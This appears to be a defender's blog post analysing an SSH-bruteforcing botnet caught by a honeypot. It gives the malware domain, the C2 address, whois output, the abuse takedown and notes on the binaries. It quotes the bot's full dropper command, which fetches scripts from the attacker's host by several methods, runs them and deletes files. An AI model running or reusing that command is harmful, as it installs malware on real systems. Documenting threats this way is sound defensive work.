I noticed a domain, tigan.cf, was being used to serve malware. The malware also seems to use one IP address as it's C2 server (54.37.79.0, over port 666). Usually, botnets use a distributed C2 architecture, making them difficult to take down. Since this malware is centralized it's easy to take down.
(Update: they changed their C2 and host from an IP address now)
Output of whois tigan.cf:
Domain name:
TIGAN.CF
Organisation:
Centrafrique TLD B.V.
Dot CF administrator
P.O. Box 11774
1001 GT Amsterdam
Netherlands
Phone: +31 20 5315725
Fax: +31 20 5315721
E-mail: abuse: abuse@freenom.com, copyright infringement: copyright@freenom.com
Domain Nameservers:
BETH.NS.CLOUDFLARE.COM
LYNN.NS.CLOUDFLARE.COM
Your selected domain name is a Free Domain. That means that,
according to the terms and conditions of Free Domain domain names
the registrant is Centrafrique TLD B.V.
Due to restrictions in Dot CF 's Privacy Statement personal information
about the user of the domain name cannot be released.
ABUSE OF A DOMAIN NAME
If you want to report abuse of this domain name, please send a
detailed email with your complaint to abuse@freenom.com.
In most cases Dot CF responds to abuse complaints within one business day.
COPYRIGHT INFRINGEMENT
If you want to report a case of copyright infringement, please send
an email to copyright@freenom.com, and include the full name and address of
your organization. Within 5 business days copyright infringement notices
will be investigated.
Record maintained by: Dot CF Domain Registry
I sent an email to the abuse contact provided, and they took down the site! I first saw the site 2021-12-03, and there was 7 total attempts on my server from 5 unique IP addresses. The site was shutdown on 12/13/2021. The malware itself is made of a few bash scripts and binaries. The binaries are packed with UPX, but the 'UPX!' string is replaced with YTX™. There was one sample labeled 'haiduc' that uses the library libssh. This seems to be a SSH bruteforcer. One of the bash scripts, go, runs haiduc with these arguements.
./haiduc $threads -f i pass.fnl $port "cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://tigan.cf/sh; curl -O http://tigan.cf/sh; chmod 777 sh; sh sh; tftp tigan.cf -c get bins.sh; chmod 777 bins.sh; sh bins.sh; tftp -r .sh -g tigan.cf; chmod 777 .sh; sh .sh; ftpget -v -u anonymous -p anonymous -P 21 tigan.cf .sh .sh; sh .sh; rm -rf sh bins.sh .sh .sh; rm -rf *"
The variables $threads and $port where set to 1500 and 22 respectively. The file pass.fnl is a password list, which matches up to the credentials used against my honeypot. The command given as a string also matches up to the command the bot ran. The file 'x86.keen.onion.1337' seems to be the C2 agent. The string 54.37.79.0:666 is embedded inside it. It also had strings such as "HTTPSTOMP", "CRUSH", and "STOP". It seems that these are commands that the malware can act on. According to the linked article, many of the commands are used for DOS.